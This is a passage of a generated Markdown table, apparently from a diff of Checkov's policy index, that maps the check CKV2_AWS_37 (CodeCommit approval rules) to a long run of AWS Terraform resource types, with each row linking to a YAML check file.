[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1174 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1175 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1176 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1177 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1178 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1179 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1180 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1181 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1182 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1183 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1184 | CKV2_AWS_37 | resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1185 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1186 | CKV2_AWS_37 | resource | aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1187 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1188 | CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1189 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1190 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1191 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1192 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1193 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1194 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1195 | CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1196 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1197 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1198 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1199 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1200 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1201 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1202 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1203 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1204 | CKV2_AWS_37 | resource | aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1205 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1206 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1207 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1208 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1209 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1210 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1211 | CKV2_AWS_37 | resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1212 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1213 | CKV2_AWS_37 | resource | aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1214 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1215 | CKV2_AWS_37 | resource | aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1216 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1217 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1218 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1219 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1220 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1221 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1222 | CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1223 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1224 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1225 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1226 | CKV2_AWS_37 | resource | aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1227 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1228 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1229 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1230 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1231 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1232 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1233 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1234 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1235 | CKV2_AWS_37 | resource | aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1236 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1237 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1238 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1239 | CKV2_AWS_37 | resource | aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1240 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1241 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1242 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1243 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1244 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1245 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1246 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1247 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1248 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1249 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1250 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1251 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1252 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1253 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1254 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1255 | CKV2_AWS_37 | resource | aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1256 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1257 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1258 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1259 | CKV2_AWS_37 | resource | aws_opsworks_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1260 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1261 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1262 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1263 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1264 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1265 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1266 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1267 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1268 | CKV2_AWS_37 | resource | aws_opsworks_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1269 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1270 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1271 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1272 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1273 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1274 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1275 | CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1276 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1277 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1278 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | 